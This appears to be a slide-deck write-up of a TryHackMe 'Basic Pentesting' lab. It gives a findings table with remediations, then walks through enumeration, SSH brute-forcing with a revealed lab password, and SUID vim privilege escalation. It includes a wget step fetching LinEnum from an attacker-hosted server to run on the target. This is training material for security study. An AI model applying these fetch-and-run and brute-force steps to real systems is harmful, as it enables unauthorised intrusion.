AHMAD ADRIANSYAH PROJECT PENTESTING

BY AHMAD ADRIANSYAH

Transparent Liquid Blob

VAPT Report

Basic Pentesting THM

A SIMULATION BY JOSIAH PIERCE FROM VULNHUB

BY AHMAD ADRIANSYAH

Information

IP Target: 10.10.225.25

Execute on October 2023

Executive Summary

CREDITS: MR SYAIFUL ANDI, BSc., MSc.

Vulnerabilities	Severity	Status	Recommendation
Multiple Vulnerabilities In Apache Version 2.4.1.8	Mixed Crit, High, Medium	Open	Update To the Latest Stable Version
Directory Listing	Medium	Open	Close The Directory Listing Function on Web Server Apache
Vulnerabilities In Samba Version 4.3.11	High	Open	Update Samba to The Latest Stable Version
Vulnerabilities In OpenSSH 7.2p2	Medium	Open	Update OpenSSH to The Latest Stable Version
Multiple Vulnerabilities in Kernel	High	Open	Update Kernel on OS In Used to The Latest Stable Version
SSH Weak Password for Jan User	Medium	Open	Change Jan’s Password Because It Exists in General Dictionary List
Misconfigured Permission in Kay’s Folder	Medium	Open	Repair Permission File Id_rsa Private Key User Key
Weak Passphrase Used for Protecting SSH Private Key	Medium	Open	Use Strong Passphrase to Secure File Id_rsa Private Key User Key
HTTP Insecure Protocol Port 80	Medium	Open	Using Safer Protocol (HTTPS)

Geometric Gradient Diagonal Line

What Will We Learn?

Black Screen With Code

Man Working on Laptop in Office

Purple and Green Computer Screen Type

Service Enumeration

Linux Enumeration

Turn on the Machine and Connect to the Network

OPEN PORTS AND FIND THE SERVICE

ACCESS HTTP (PORT 80)

OOPS! THERE IS WEB SERVER RUNNING ON PORT 80

LOOK AT THE SOURCE CODE

CHECK DEV NOTE SECTION? LET’S FIND THE ALTERNATIVE

USING DIRBUSTER OR GOBUSTER

YEAY! WE FOUND THE HIDDEN DIRECTORY, CALLED DEVELOPMENT

USER BRUTE FORCING

THAT IS THE DEVELOPMENT PAGE, LET’S READ DEV.TXT AND J.TXT

READ THE DEV.TXT

ALRIGHT, FROM HERE WE KNOW THAT THE VERSION IS 2.5.12

READ THE J.TXT

GOT IT, WE FOUND A HINT THAT THE WEAK CREDENTIALS IS IN /etc/shadow

ENUMERATE THE DISCOVERED SMB

WOW! THERES A LOT OF INFORMATION HERE.

WHAT’S THAT? WE CAN USE ‘’ AS USERNAME AND PASSWORD?

DISCOVERED TWO USER ACCOUNTS

HOORAY!

SUCCESSFULLY DISCOVERED TWO USER ACCOUNTS, IT SEEMS BELONGS TO KAY AND JAN

BRUTEFORCING JAN’S ACCOUNT

YIPPEEE! WE SUCCESSFULLY CRACK JAN’S SSH ACCESS

WE CAN SEE THAT JAN’S PASSWORD IS ARMANDO

ENUMERATE THE MACHINE TO FIND ANY VECTORS

FOR PPRIVILEGE ESCALATION

WE NEED TO LOG IN TO JAN’S ACCOUNT

TYPE JAN’S PASSWORD TO CONTINUE

BINGO! WE ALSO FOUND KAY’S HOME DIRECTORY IN HERE

WHAT’S THAT? PASS.BAK? IS IT A BACKUP OR MAYBE A PASSWORD?

USE LINENUM

FOR PPRIVILEGE ESCALATION

YOU CAN DOWNLOAD LINENUM FROM HERE

Startup a simple Python web server from the directory of the new file: python -m http.server 8000

Download the file from the target machine: wget http://<attacker ip>:8000/LinEnum

You need to give yourself executable privileges on the file: chmod +x LinEnum

Run it!

CREDITS: JASPER ALBLAS

READ THE LINENUM ADMIN USER RESULT

WOW! KAY IS ALSO AN ADMINISTRATOR

WE CAN READ THE PASSWD, BUT NOT THE SHADOW

HMM, WE CAN SEE THAT VIM.BASIC IS A SUID FILE

RUN IT! WE CAN USE VIM TO READ THE PASS.BAK FROM THE EARLIER

FINALLY, WE CAN READ WHAT’S INSIDE THE PASS.BAK FILE

THIS IS THE END OF THE SLIDE

PLEASE VISIT OUR THM ACCOUNT BY CLICKING HERE

AHMAD ADRIANSYAH

Talk To Us

Feel free to call, email, or hit us up on our social media accounts.